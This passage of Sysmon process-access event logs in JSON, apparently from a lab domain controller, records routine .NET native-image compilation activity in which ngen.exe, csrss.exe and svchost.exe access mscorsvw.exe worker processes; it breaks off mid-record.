{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.741\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00106D290D00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.741","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00106D290D00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.741\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00106D290D00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.741","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00106D290D00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.757\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00106D290D00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.757","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00106D290D00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.804\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00107B2D0D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.804","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00107B2D0D00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00107B2D0D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00107B2D0D00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00107B2D0D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00107B2D0D00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.866\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010A6310D00}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.866","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010A6310D00}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.866\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010A6310D00}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: 